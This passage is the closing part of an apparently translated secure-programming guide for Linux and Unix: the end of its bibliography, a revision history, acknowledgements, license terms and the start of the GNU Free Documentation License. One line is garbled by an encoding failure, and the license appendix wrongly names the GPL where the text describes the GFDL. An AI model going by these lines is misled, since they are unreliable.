[Felten 1997] Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S.
Wallach. Web Spoofing: An Internet Con Game Technical Report 540-96
(revised Feb. 1997) Department of Computer Science, Princeton
University http://www.cs.princeton.edu/sip/pub/spoofing.pdf

[Fenzi 1999] Fenzi, Kevin, and Dave Wrenski. April 25, 1999. Linux
Security HOWTO. Version 1.0.2. http://www.linuxdoc.org/HOWTO/
Security-HOWTO.html

[FHS 1997] Filesystem Hierarchy Standard (FHS 2.0). October 26, 1997.
Filesystem Hierarchy Standard Group, edited by Daniel Quinlan. Version
2.0. http://www.pathname.com/fhs.

[Filipski 1986] Filipski, Alan and James Hanko. April 1986. ``Making
Unix Secure.'' Byte (Magazine). Peterborough, NH: McGraw-Hill Inc. Vol.
11, No. 4. ISSN 0360-5280. pp. 113-128.

[Flake 2001] Flake, Havlar. Auditing Binaries for Security
Vulnerabilities. http://www.blackhat.com/html/win-usa-01/
win-usa-01-speakers.html.

[FOLDOC] Free On-Line Dictionary of Computing. http://
foldoc.doc.ic.ac.uk/foldoc/index.html.

[Forristal 2001] Forristal, Jeff, and Greg Shipley. January 8, 2001.
Vulnerability Assessment Scanners. Network Computing. http://
www.nwc.com/1201/1201f1b1.html

[FreeBSD 1999] FreeBSD, Inc. 1999. ``Secure Programming Guidelines''. 
FreeBSD Security Information. http://www.freebsd.org/security/
security.html

[FSF 1998] Free Software Foundation. December 17, 1999. Overview of the
GNU Project. http://www.gnu.ai.mit.edu/gnu/gnu-history.html

[FSF 1999] Free Software Foundation. January 11, 1999. The GNU C
Library Reference Manual. Edition 0.08 DRAFT, for Version 2.1 Beta of
the GNU C Library. Available at, for example, http://www.netppl.fi/~pp/
glibc21/libc_toc.html

Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster. August 2001.
``Dos and Don'ts of Client Authentication on the Web''. Proceedings of
the 10th USENIX Security Symposium, Washington, D.C., August 2001. 
http://cookies.lcs.mit.edu/pubs/webauth.html.

[Gabrilovich 2002] Gabrilovich, Evgeniy, and Alex Gontmakher. February
2002. ``Inside Risks: The Homograph Attack''. Communications of the
ACM. Volume 45, Number 2. Page 128. 

[Galvin 1998a] Galvin, Peter. April 1998. ``Designing Secure
Software''. Sunworld. http://www.sunworld.com/swol-04-1998/
swol-04-security.html.

[Galvin 1998b] Galvin, Peter. August 1998. ``The Unix Secure
Programming FAQ''. Sunworld. http://www.sunworld.com/sunworldonline/
swol-08-1998/swol-08-security.html

[Garfinkel 1996] Garfinkel, Simson and Gene Spafford. April 1996. 
Practical UNIX & Internet Security, 2nd Edition. ISBN 1-56592-148-8.
Sebastopol, CA: O'Reilly & Associates, Inc. http://www.oreilly.com/
catalog/puis

[Garfinkle 1997] Garfinkle, Simson. August 8, 1997. 21 Rules for
Writing Secure CGI Programs. http://webreview.com/wr/pub/97/08/08/
bookshelf

[Gay 2000] Gay, Warren W. October 2000. Advanced Unix Programming.
Indianapolis, Indiana: Sams Publishing. ISBN 0-67231-990-X.

[Geodsoft 2001] Geodsoft. February 7, 2001. Hardening OpenBSD Internet
Servers. http://www.geodsoft.com/howto/harden.

[Graham 1999] Graham, Jeff. May 4, 1999. Security-Audit's Frequently
Asked Questions (FAQ). http://lsap.org/faq.txt

[Gong 1999] Gong, Li. June 1999. Inside Java 2 Platform Security.
Reading, MA: Addison Wesley Longman, Inc. ISBN 0-201-31000-7.

[Gundavaram Unknown] Gundavaram, Shishir, and Tom Christiansen. Date
Unknown. Perl CGI Programming FAQ. http://language.perl.com/CPAN/doc/
FAQs/cgi/perl-cgi-faq.html

[Hall "Beej" 1999] Hall, Brian "Beej". Beej's Guide to Network
Programming Using Internet Sockets. 13-Jan-1999. Version 1.5.5. http://
www.ecst.csuchico.edu/~beej/guide/net

[ISO 12207] International Organization for Standardization (ISO). 1995.
Information technology -- Software life cycle processes ISO/IEC 12207:
1995.

[ISO 13335] International Organization for Standardization (ISO). ISO/
IEC TR 13335. Guidelines for the Management of IT Security (GMITS).
Note that this is a five-part technical report (not a standard); see
also ISO/IEC 17799:2000. It includes:

 E ISO 13335-1: Concepts and Models for IT Security
   
 E ISO 13335-2: Managing and Planning IT Security
   
 E ISO 13335-3: Techniques for the Management of IT Security
   
 E ISO 13335-4: Selection of Safeguards
   
 E ISO 13335-5: Safeguards for External Connections
   
[ISO 17799] International Organization for Standardization (ISO).
December 2000. Code of Practice for Information Security Management.
ISO/IEC 17799:2000.

[ISO 9000] International Organization for Standardization (ISO). 2000.
Quality management systems - Fundamentals and vocabulary. ISO 9000:
2000. See http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/
iso9000family.html

[ISO 9000] International Organization for Standardization (ISO). 2000.
Quality management systems - Requirements ISO 9001:2000

[Jones 2000] Jones, Jennifer. October 30, 2000. ``Banking on Privacy''.
InfoWorld, Volume 22, Issue 44. San Mateo, CA: International Data Group
(IDG). pp. 1-12.

[Kelsey 1998] Kelsey, J., B. Schneier, D. Wagner, and C. Hall. March
1998. "Cryptanalytic Attacks on Pseudorandom Number Generators." Fast
Software Encryption, Fifth International Workshop Proceedings (March
1998), Springer-Verlag, 1998, pp. 168-188. http://www.counterpane.com/
pseudorandom_number.html.

[Kernighan 1988] Kernighan, Brian W., and Dennis M. Ritchie. 1988. The
C Programming Language. Second Edition. Englewood Cliffs, NJ:
Prentice-Hall. ISBN 0-13-110362-8.

[Kim 1996] Kim, Eugene Eric. 1996. CGI Developer's Guide. SAMS.net
Publishing. ISBN: 1-57521-087-8 http://www.eekim.com/pubs/cgibook

[Kuchling 2000]. Kuchling, A.M. 2000. Restricted Execution HOWTO. http:
//www.python.org/doc/howto/rexec/rexec.html

[Kuhn 2002] Kuhn, Markus G. Optical Time-Domain Eavesdropping Risks of
CRT displays. Proceedings of the 2002 IEEE Symposium on Security and
Privacy, Oakland, CA, May 12-15, 2002. http://www.cl.cam.ac.uk/~mgk25/
ieee02-optical.pdf

[LSD 2001] The Last Stage of Delirium. July 4, 2001. UNIX Assembly
Codes Development for Vulnerabilities Illustration Purposes. http://
lsd-pl.net/papers.html#assembly.

[McClure 1999] McClure, Stuart, Joel Scambray, and George Kurtz. 1999. 
Hacking Exposed: Network Security Secrets and Solutions. Berkeley, CA:
Osbourne/McGraw-Hill. ISBN 0-07-212127-0.

[McKusick 1999] McKusick, Marshall Kirk. January 1999. ``Twenty Years
of Berkeley Unix: From AT&T-Owned to Freely Redistributable.'' Open
Sources: Voices from the Open Source Revolution. http://www.oreilly.com
/catalog/opensources/book/kirkmck.html.

[McGraw 1999] McGraw, Gary, and Edward W. Felten. December 1998. Twelve
Rules for developing more secure Java code. Javaworld. http://
www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html.

[McGraw 1999] McGraw, Gary, and Edward W. Felten. January 25, 1999.
Securing Java: Getting Down to Business with Mobile Code, 2nd Edition
John Wiley & Sons. ISBN 047131952X. http://www.securingjava.com.

[McGraw 2000a] McGraw, Gary and John Viega. March 1, 2000. Make Your
Software Behave: Learning the Basics of Buffer Overflows. http://
www-4.ibm.com/software/developer/library/overflows/index.html.

[McGraw 2000b] McGraw, Gary and John Viega. April 18, 2000. Make Your
Software Behave: Software strategies In the absence of hardware, you
can devise a reasonably secure random number generator through
software. http://www-106.ibm.com/developerworks/library/randomsoft/
index.html?dwzone=security.

[Miller 1995] Miller, Barton P., David Koski, Cjin Pheow Lee,
Vivekananda Maganty, Ravi Murthy, Ajitkumar Natarajan, and Jeff Steidl.
1995. Fuzz Revisited: A Re-examination of the Reliability of UNIX
Utilities and Services. ftp://grilled.cs.wisc.edu/technical_papers/
fuzz-revisited.pdf.

[Miller 1999] Miller, Todd C. and Theo de Raadt. ``strlcpy and strlcat
-- Consistent, Safe, String Copy and Concatenation'' Proceedings of
Usenix '99. http://www.usenix.org/events/usenix99/millert.html and 
http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST

[Mudge 1995] Mudge. October 20, 1995. How to write Buffer Overflows.
l0pht advisories. http://www.l0pht.com/advisories/bufero.html.

[Murhammer 1998] Murhammer, Martin W., Orcun Atakan, Stefan Bretz,
Larry R. Pugh, Kazunari Suzuki, and David H. Wood. October 1998. TCP/IP
Tutorial and Technical Overview IBM International Technical Support
Organization. http://www.redbooks.ibm.com/pubs/pdfs/redbooks/
gg243376.pdf

[NCSA] NCSA Secure Programming Guidelines. http://www.ncsa.uiuc.edu/
General/Grid/ACES/security/programming.

Neumann, Peter. 2000. "Robust Nonproprietary Software." Proceedings of
the 2000 IEEE Symposium on Security and Privacy (the ``Oakland
Conference''), May 14-17, 2000, Berkeley, CA. Los Alamitos, CA: IEEE
Computer Society. pp.122-123.

National Security Agency (NSA). September 2000. Information Assurance
Technical Framework (IATF). http://www.iatf.net.

[Open Group 1997] The Open Group. 1997. Single UNIX Specification,
Version 2 (UNIX 98). http://www.opengroup.org/online-pubs?DOC=007908799
.

[OSI 1999]. Open Source Initiative. 1999. The Open Source Definition. 
http://www.opensource.org/osd.html.

[Opplinger 1998] Oppliger, Rolf. 1998. Internet and Intranet Security.
Norwood, MA: Artech House. ISBN 0-89006-829-1.

[Paulk 1993a] Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and
Charles V. Weber. Capability Maturity Model for Software, Version 1.1.
Software Engineering Institute, CMU/SEI-93-TR-24. DTIC Number
ADA263403, February 1993. http://www.sei.cmu.edu/activities/cmm/
obtain.cmm.html.

[Paulk 1993b] Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary
Beth Chrissis, and Marilyn W. Bush. Key Practices of the Capability
Maturity Model, Version 1.1. Software Engineering Institute. CMU/
SEI-93-TR-25, DTIC Number ADA263432, February 1993.

[Peteanu 2000] Peteanu, Razvan. July 18, 2000. Best Practices for
Secure Web Development. http://members.home.net/razvan.peteanu

[Pfleeger 1997] Pfleeger, Charles P. 1997. Security in Computing. Upper
Saddle River, NJ: Prentice-Hall PTR. ISBN 0-13-337486-6.

[Phillips 1995] Phillips, Paul. September 3, 1995. Safe CGI Programming
. http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt

[Quintero 1999] Quintero, Federico Mena, Miguel de Icaza, and Morten
Welinder GNOME Programming Guidelines http://developer.gnome.org/doc/
guides/programming-guidelines/book1.html

[Raymond 1997] Raymond, Eric. 1997. The Cathedral and the Bazaar. http:
//www.tuxedo.org/~esr/writings/cathedral-bazaar

[Raymond 1998] Raymond, Eric. April 1998. Homesteading the Noosphere. 
http://www.tuxedo.org/~esr/writings/homesteading/homesteading.html

[Ranum 1998] Ranum, Marcus J. 1998. Security-critical coding for
programmers - a C and UNIX-centric full-day tutorial. http://
www.clark.net/pub/mjr/pubs/pdf/.

[RFC 822] August 13, 1982 Standard for the Format of ARPA Internet Text
Messages. IETF RFC 822. http://www.ietf.org/rfc/rfc0822.txt.

[rfp 1999] rain.forest.puppy. 1999. ``Perl CGI problems''. Phrack
Magazine. Issue 55, Article 07. http://www.phrack.com/search.phtml?view
&article=p55-7 or http://www.insecure.org/news/P55-07.txt.

[Rijmen 2000] Rijmen, Vincent. "LinuxSecurity.com Speaks With AES
Winner". http://www.linuxsecurity.com/feature_stories/
interview-aes-3.html.

[Rochkind 1985]. Rochkind, Marc J. Advanced Unix Programming. Englewood
Cliffs, NJ: Prentice-Hall, Inc. ISBN 0-13-011818-4.

[St. Laurent 2000] St. Laurent, Simon. February 2000. XTech 2000
Conference Reports. ``When XML Gets Ugly''. http://www.xml.com/pub/2000
/02/xtech/megginson.html.

[Saltzer 1974] Saltzer, J. July 1974. ``Protection and the Control of
Information Sharing in MULTICS''. Communications of the ACM. v17 n7.
pp. 388-402.

[Saltzer 1975] Saltzer, J., and M. Schroeder. September 1975. ``The
Protection of Information in Computing Systems''. Proceedings of the
IEEE. v63 n9. pp. 1278-1308. http://www.mediacity.com/~norm/CapTheory/
ProtInf. Summarized in [Pfleeger 1997, 286].

Schneider, Fred B. 2000. "Open Source in Security: Visting the
Bizarre." Proceedings of the 2000 IEEE Symposium on Security and
Privacy (the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
Los Alamitos, CA: IEEE Computer Society. pp.126-127.

[Schneier 1996] Schneier, Bruce. 1996. Applied Cryptography, Second
Edition: Protocols, Algorithms, and Source Code in C. New York: John
Wiley and Sons. ISBN 0-471-12845-7.

[Schneier 1998] Schneier, Bruce and Mudge. November 1998. Cryptanalysis
of Microsoft's Point-to-Point Tunneling Protocol (PPTP) Proceedings of
the 5th ACM Conference on Communications and Computer Security, ACM
Press. http://www.counterpane.com/pptp.html.

[Schneier 1999] Schneier, Bruce. September 15, 1999. ``Open Source and
Security''. Crypto-Gram. Counterpane Internet Security, Inc. http://
www.counterpane.com/crypto-gram-9909.html

[Seifried 1999] Seifried, Kurt. October 9, 1999. Linux Administrator's
Security Guide. http://www.securityportal.com/lasg.

[Seifried 2001] Seifried, Kurt. September 2, 2001. WWW Authentication 
http://www.seifried.org/security/www-auth/index.html.

[Shankland 2000] Shankland, Stephen. ``Linux poses increasing threat to
Windows 2000''. CNET. http://news.cnet.com/news/0-1003-200-1549312.html

[Shostack 1999] Shostack, Adam. June 1, 1999. Security Code Review
Guidelines. http://www.homeport.org/~adam/review.html.

[Sibert 1996] Sibert, W. Olin. Malicious Data and Computer Security.
(NIST) NISSC '96. http://www.fish.com/security/maldata.html 

[Sitaker 1999] Sitaker, Kragen. Feb 26, 1999. How to Find Security
Holes http://www.pobox.com/~kragen/security-holes.html and http://
www.dnaco.net/~kragen/security-holes.html

[SSE-CMM 1999] SSE-CMM Project. April 1999. Systems Security
Engineering Capability Maturity Model (SSE CMM) Model Description
Document. Version 2.0. http://www.sse-cmm.org

[Stallings 1996] Stallings, William. Practical Cryptography for Data
Internetworks. Los Alamitos, CA: IEEE Computer Society Press. ISBN
0-8186-7140-8.

[Stein 1999]. Stein, Lincoln D. September 13, 1999. The World Wide Web
Security FAQ. Version 2.0.1 http://www.w3.org/Security/Faq/
www-security-faq.html

[Swan 2001] Swan, Daniel. January 6, 2001. comp.os.linux.security FAQ.
Version 1.0. http://www.linuxsecurity.com/docs/colsfaq.html.

[Swanson 1996] Swanson, Marianne, and Barbara Guttman. September 1996.
Generally Accepted Principles and Practices for Securing Information
Technology Systems. NIST Computer Security Special Publication (SP)
800-14. http://csrc.nist.gov/publications/nistpubs/index.html.

[Thompson 1974] Thompson, K. and D.M. Richie. July 1974. ``The UNIX
Time-Sharing System''. Communications of the ACM Vol. 17, No. 7. pp.
365-375.

[Torvalds 1999] Torvalds, Linus. February 1999. ``The Story of the
Linux Kernel''. Open Sources: Voices from the Open Source Revolution.
Edited by Chris Dibona, Mark Stone, and Sam Ockman. O'Reilly and
Associates. ISBN 1565925823. http://www.oreilly.com/catalog/opensources
/book/linus.html

[TruSecure 2001] TruSecure. August 2001. Open Source Security: A Look
at the Security Benefits of Source Code Access. http://
www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf

[Unknown] SETUID(7) http://www.homeport.org/~adam/setuid.7.html.

[Van Biesbrouck 1996] Van Biesbrouck, Michael. April 19, 1996. http://
www.csclub.uwaterloo.ca/u/mlvanbie/cgisec.

[van Oorschot 1994] van Oorschot, P. and M. Wiener. November 1994.
``Parallel Collision Search with Applications to Hash Functions and
Discrete Logarithms.'' Proceedings of ACM Conference on Computer and
Communications Security.

[Venema 1996] Venema, Wietse. 1996. Murphy's law and computer security.
http://www.fish.com/security/murphy.html

[Watters 1996] Watters, Arron, Guido van Rossum, James C. Ahlstrom.
1996. Internet Programming with Python. NY, NY: Henry Hold and Company,
Inc.

[Witten 2001] September/October 2001. Witten, Brian, Carl Landwehr, and
Michael Caloyannides. ``Does Open Source Improve System Security?''
IEEE Software. pp. 57-61. http://www.computer.org/software 

[Wood 1985] Wood, Patrick H. and Stephen G. Kochan. 1985. Unix System
Security. Indianapolis, Indiana: Hayden Books. ISBN 0-8104-6267-2.

[Wreski 1998] Wreski, Dave. August 22, 1998. Linux Security
Administrator's Guide. Version 0.98. http://www.nic.com/~dave/
SecurityAdminGuide/index.html

[Yoder 1998] Yoder, Joseph and Jeffrey Barcalow. 1998. Architectural
Patterns for Enabling Application Security. PLoP '97 http://
st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf

[Zalewski 2001] Zalewski, Michael. May 16-17, 2001. Delivering Signals
for Fun and Profit: Understanding, exploiting and preventing
signal-handling related vulnerabilities. Bindview Corporation. http://
razor.bindview.com/publish/papers/signals.txt

[Zoebelein 1999] Zoebelein, Hans U. April 1999. The Internet Operating
System Counter. http://www.leb.net/hzo/ioscount.

y IPA ̃ZLAEvO~Ou <http://www.ipa.go.jp/
security/awareness/vendor/programming/index.html> ɗ܂z

 

Appendix A. History

Here are the major highlights from this document's revision history.

2001-01-01 David A. Wheeler
   
    Version 2.70. Added a significant amount of material, for example
    on cross-site malicious content, filtering of HTML and URIs, and a
    greatly expanded discussion of temporary files.
   
2000-05-24 David A. Wheeler
   
    Changed the license to GNU's GFDL. Added content.
   
2000-04-21 David A. Wheeler
   
    Version 2.00. On April 21, 2000, the document's source format was
    changed from the Linuxdoc DTD to the DocBook DTD. Thanks to Jorge
    Godoy for helping with this transition.
   
2000-04-04 David A. Wheeler
   
    Version 1.60. Changed the document to cover both Linux and Unix.
    Most of the guidelines already covered both, and since developers
    often want their applications to run on both, covering both is
    important.
   
2000-02-09 David A. Wheeler
   
    The document joined the Linux Documentation Project (LDP).
   
1999-11-29 David A. Wheeler
   
    Initial version. First release.
   
A detailed list of changes is available in the online ``ChangeLog''
file.

 

Appendix B. Acknowledgements

                                    As iron sharpens iron, so one man
                                    sharpens another.
                                                                       
                                           Proverbs 27:17 (NIV)

My thanks to the following people, who pointed out errors by email,
advised me on what to cover, and helped in many other ways. The word
``thanks'' is prepended to the email addresses so that mass-mailing
programs cannot easily harvest them. No one has the right to send junk
mail to the people on this list.

 * Neil Brown (thanks.neilb@cse.unsw.edu.au)
   
 * Martin Douda (thanks.mad@students.zcu.cz)
   
 * Jorge Godoy
   
 * Scott Ingram (thanks.scott@silver.jhuapl.edu)
   
 * Michael Kerrisk
   
 * Doug Kilpatrick
   
 * John Levon (moz@compsoc.man.ac.uk)
   
 * Ryan McCabe (thanks.odin@numb.org)
   
 * Paul Millar (thanks.paulm@astro.gla.ac.uk)
   
 * Chuck Phillips (thanks.cdp@peakpeak.com)
   
 * Martin Pool (thanks.mbp@humbug.org.au)
   
 * Eric S. Raymond (thanks.esr@snark.thyrsus.com)
   
 * Marc Welz
   
 * Eric Werme (thanks.werme@alpha.zk3.dec.com)
   
 

If you would like to be added to this list, send constructive comments
to dwheeler@dwheeler.com <mailto:dwheeler@dwheeler.com>. If you send
constructive comments but do not want to appear in the
acknowledgements, please tell me when you send your comments,
criticisms or suggestions. I assume that most people like to be
credited, and I want to express my gratitude. I add contributors'
names to this list in the document and record the details of each
contribution in the ChangeLog (available online). The ideas and
reviews came from them, but the actual text is mine, so if there are
mistakes, please do not blame them. In general, if you send
constructive comments, I would be glad.

 

Appendix C. About the Document License

                                    I know that everything God does will
                                    endure forever; nothing can be added
                                    to it and nothing taken from it.
                                                                       
                                     Ecclesiastes 3:14 (NIV)

This document is copyright David A. Wheeler (Copyright (C) 1999-2000
David A. Wheeler). Copying, redistribution and modification are
permitted under the terms of the GNU General Public License (GPL),
Version 1.1 or any later version published by the Free Software
Foundation. The invariant section is ``About the Author''; there are
no Front-Cover Texts and no Back-Cover Texts. A copy of the license is
in Appendix D below.

Under these terms other web sites may mirror this document, but please
be sure to follow the conditions below:

 * Update the mirror automatically from the master site.
   
 * Show the location of the master site
   (http://www.dwheeler.com/secure-programs) clearly as a hypertext
   link.
   
 * Give credit to the author (David A. Wheeler).
   
 

The first two points exist mainly to keep me from hearing about the
same mistakes over and over again; being told about a mistake that was
fixed a year ago is a nuisance, and that is what happens when a mirror
is not kept up to date. With a link to the master site, users can
check whether the mirror they are reading is current. Some sites that
need strong security are sensitive about their exposure and regard
frequent connections to the Internet as dangerous; in that situation,
satisfy the remaining point and keep the copy updated by other media.

Under this license the document may be modified. You may not, however,
claim that it belongs to no one (that is, that it is in the public
domain), nor may you claim that a modified version is identical to the
original. Even if you modify it, all of the changes remain subject to
the license; in copyright law this is not a ``public domain'' work.
See Appendix D for the details of the license, and contact me if you
are in any doubt about whether something is permitted. Changes are
reflected in the master copy, together with other changes, under the
authority of the maintainer (currently David A. Wheeler).

That said, this is not a matter of law. Copyright law does not protect
things too small to count as constituent parts of a work (for example,
a claim to ``own every B flat and B flat minor chord''). Compared with
a whole program, the small fragments of code in this book are similar
in that they are tiny. I have tried to make the code in this document
usable by anyone, but some of you may still be concerned about its
legal status. So, to make it clear that you can use this code in your
own software, the small code fragments written directly in this
document are released under the ``MIT license'', which guarantees that
it carries about as few restrictions as the law allows.

  Source code in this book not otherwise identified is                 
  Copyright (c) 1999-2001 David A. Wheeler.                            
                                                                       
  Permission is hereby granted, free of charge, to any person          
  obtaining a copy of the source code in this book not                 
  otherwise identified (the "Software"), to deal in the                
  Software without restriction, including without limitation           
  the rights to use, copy, modify, merge, publish, distribute,         
  sublicense, and/or sell copies of the Software, and to               
  permit persons to whom the Software is furnished to do so,           
  subject to the following conditions:                                 
                                                                       
  The above copyright notice and this permission notice shall be       
  included in all copies or substantial portions of the Software.      
                                                                       
  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,      
  EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE                 
  WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR              
  PURPOSE AND NONINFRINGEMENT.                                         
  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE                
  LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,                    
  WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,                 
  ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE              
  OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.                        
[Translator's note: http://www.opensource.org is a useful reference for
the various open-source licenses. OSG-JP <http://www.opensource.jp>
also has a translation of the MIT license.]

 

Appendix D. GNU Free Documentation License

Version 1.1, March 2000

Copyright 2000

      Free Software Foundation, Inc. 
      59 Temple Place, Suite 330, 
      Boston, 
      MA  
      02111-1307  
      USA
    

Everyone is permitted to copy and distribute verbatim copies of this
license document, but changing it is not allowed.

0. PREAMBLE
   
    The purpose of this License is to make a manual, textbook, or other
    written document "free" in the sense of freedom: to assure everyone
    the effective freedom to copy and redistribute it, with or without
    modifying it, either commercially or noncommercially. Secondarily,
    this License preserves for the author and publisher a way to get
    credit for their work, while not being considered responsible for
    modifications made by others.
   
    This License is a kind of "copyleft", which means that derivative
    works of the document must themselves be free in the same sense. It
    complements the GNU General Public License, which is a copyleft
    license designed for free software.
   
    We have designed this License in order to use it for manuals for
    free software, because free software needs free documentation: a
    free program should come with manuals providing the same freedoms
    that the software does. But this License is not limited to software
    manuals; it can be used for any textual work, regardless of subject
    matter or whether it is published as a printed book. We recommend
    this License principally for works whose purpose is instruction or
    reference.
   
1. APPLICABILITY AND DEFINITIONS
   
    This License applies to any manual or other work that contains a
    notice placed by the copyright holder saying it can be distributed
    under the terms of this License. The "Document" , below, refers to
    any such manual or work. Any member of the public is a licensee,
    and is addressed as "you".
   
    A "Modified Version" of the Document means any work containing the
    Document or a portion of it, either copied verbatim, or with
    modifications and/or translated into another language.
   
    A "Secondary Section" is a named appendix or a front-matter section
    of the Document that deals exclusively with the relationship of the
    publishers or authors of the Document to the Document's overall
    subject (or to related matters) and contains nothing that could
    fall directly within that overall subject. (For example, if the 
    Document is in part a textbook of mathematics, a Secondary Section
    may not explain any mathematics.) The relationship could be a
    matter of historical connection with the subject or with related
    matters, or of legal, commercial, philosophical, ethical or
    political position regarding them.
   
    The "Invariant Sections" are certain Secondary Sections whose
    titles are designated, as being those of Invariant Sections, in the
    notice that says that the Document is released under this License.
   
    The "Cover Texts" are certain short passages of text that are
    listed, as Front-Cover Texts or Back-Cover Texts, in the notice
    that says that the Document is released under this License.
   
    A "Transparent" copy of the Document means a machine-readable copy,
    represented in a format whose specification is available to the
    general public, whose contents can be viewed and edited directly
    and straightforwardly with generic text editors or (for images
    composed of pixels) generic paint programs or (for drawings) some
    widely available drawing editor, and that is suitable for input to
    text formatters or for automatic translation to a variety of
    formats suitable for input to text formatters. A copy made in an
    otherwise Transparent file format whose markup has been designed to
    thwart or discourage subsequent modification by readers is not 
    Transparent. A copy that is not "Transparent" is called "Opaque".
   
    Examples of suitable formats for Transparent copies include plain
    ASCII without markup, Texinfo input format, LaTeX input format,
    SGML or XML using a publicly available DTD, and standard-conforming
    simple HTML designed for human modification. Opaque formats include
    PostScript, PDF, proprietary formats that can be read and edited
    only by proprietary word processors, SGML or XML for which the DTD
    and/or processing tools are not generally available, and the
    machine-generated HTML produced by some word processors for output
    purposes only.
   
    The "Title Page" means, for a printed book, the title page itself,
    plus such following pages as are needed to hold, legibly, the
    material this License requires to appear in the title page. For
    works in formats which do not have any title page as such, "Title
    Page" means the text near the most prominent appearance of the
    work's title, preceding the beginning of the body of the text.
   
2. VERBATIM COPYING
   
    You may copy and distribute the Document in any medium, either
    commercially or noncommercially, provided that this License, the
    copyright notices, and the license notice saying this License
    applies to the Document are reproduced in all copies, and that you
    add no other conditions whatsoever to those of this License. You
    may not use technical measures to obstruct or control the reading
    or further copying of the copies you make or distribute. However,
    you may accept compensation in exchange for copies. If you
    distribute a large enough number of copies you must also follow the
    conditions in section 3.
   
    You may also lend copies, under the same conditions stated above,
    and you may publicly display copies.
   
3. COPYING IN QUANTITY
   
    If you publish printed copies of the Document numbering more than
    100, and the Document's license notice requires Cover Texts, you
    must enclose the copies in covers that carry, clearly and legibly,
    all these Cover Texts: Front-Cover Texts on the front cover, and
    Back-Cover Texts on the back cover. Both covers must also clearly
    and legibly identify you as the publisher of these copies. The
    front cover must present the full title with all words of the title
    equally prominent and visible. You may add other material on the
    covers in addition. Copying with changes limited to the covers, as
    long as they preserve the title of the Document and satisfy these
    conditions, can be treated as verbatim copying in other respects.
   
    If the required texts for either cover are too voluminous to fit
    legibly, you should put the first ones listed (as many as fit
    reasonably) on the actual cover, and continue the rest onto
    adjacent pages.
   
    If you publish or distribute Opaque copies of the Document
    numbering more than 100, you must either include a machine-readable
    Transparent copy along with each Opaque copy, or state in or with
    each Opaque copy a publicly-accessible computer-network location
    containing a complete Transparent copy of the Document, free of
    added material, which the general network-using public has access
    to download anonymously at no charge using public-standard network
    protocols. If you use the latter option, you must take reasonably
    prudent steps, when you begin distribution of Opaque copies in
    quantity, to ensure that this Transparent copy will remain thus
    accessible at the stated location until at least one year after the
    last time you distribute an Opaque copy (directly or through your
    agents or retailers) of that edition to the public.
   
    It is requested, but not required, that you contact the authors of
    the Document well before redistributing any large number of copies,
    to give them a chance to provide you with an updated version of the
    Document.
   
4. MODIFICATIONS
   
    You may copy and distribute a Modified Version of the Document
    under the conditions of sections 2 and 3 above, provided that you
    release the Modified Version under precisely this License, with the
    Modified Version filling the role of the Document, thus licensing
    distribution and modification of the Modified Version to whoever
    possesses a copy of it. In addition, you must do these things in
    the Modified Version:
   
     A. Use in the Title Page (and on the covers, if any) a title
        distinct from that of the Document, and from those of previous
        versions (which should, if there were any, be listed in the
        History section of the Document). You may use the same title as
        a previous version if the original publisher of that version
        gives permission.
       
     B. List on the Title Page, as authors, one or more persons or
        entities responsible for authorship of the modifications in the
        Modified Version, together with at least five of the principal
        authors of the Document (all of its principal authors, if it
        has less than five).
       
     C. State on the Title Page the name of the publisher of the 
        Modified Version, as the publisher.
       
     D. Preserve all the copyright notices of the Document.
       
     E. Add an appropriate copyright notice for your modifications
        adjacent to the other copyright notices.
       
     F. Include, immediately after the copyright notices, a license
        notice giving the public permission to use the Modified Version
        under the terms of this License, in the form shown in the
        Addendum below.
       
     G. Preserve in that license notice the full lists of Invariant
        Sections and required Cover Texts given in the Document's
        license notice.
       
     H. Include an unaltered copy of this License.
       
     I. Preserve the section entitled "History", and its title, and add
        to it an item stating at least the title, year, new authors,
        and publisher of the Modified Version as given on the Title
        Page. If there is no section entitled "History" in the Document
        , create one stating the title, year, authors, and publisher of
        the Document as given on its Title Page, then add an item
        describing the Modified Version as stated in the previous
        sentence.
       
     J. Preserve the network location, if any, given in the Document
        for public access to a Transparent copy of the Document, and
        likewise the network locations given in the Document for
        previous versions it was based on. These may be placed in the
        "History" section. You may omit a network location for a work
        that was published at least four years before the Document
        itself, or if the original publisher of the version it refers
        to gives permission.
       
     K. In any section entitled "Acknowledgements" or "Dedications",
        preserve the section's title, and preserve in the section all
        the substance and tone of each of the contributor
        acknowledgements and/or dedications given therein.
       
     L. Preserve all the Invariant Sections of the Document, unaltered
        in their text and in their titles. Section numbers or the
        equivalent are not considered part of the section titles.
       
     M. Delete any section entitled "Endorsements". Such a section may
        not be included in the Modified Version.
       
     N. Do not retitle any existing section as "Endorsements" or to
        conflict in title with any Invariant Section.
       
    If the Modified Version includes new front-matter sections or
    appendices that qualify as Secondary Sections and contain no
    material copied from the Document, you may at your option designate
    some or all of these sections as invariant. To do this, add their
    titles to the list of Invariant Sections in the Modified Version's
    license notice. These titles must be distinct from any other
    section titles.
   
    You may add a section entitled "Endorsements", provided it contains
    nothing but endorsements of your Modified Version by various
    parties--for example, statements of peer review or that the text
    has been approved by an organization as the authoritative
    definition of a standard.
   
    You may add a passage of up to five words as a Front-Cover Text,
    and a passage of up to 25 words as a Back-Cover Text, to the end of
    the list of Cover Texts in the Modified Version. Only one passage
    of Front-Cover Text and one of Back-Cover Text may be added by (or
    through arrangements made by) any one entity. If the Document
    already includes a cover text for the same cover, previously added
    by you or by arrangement made by the same entity you are acting on
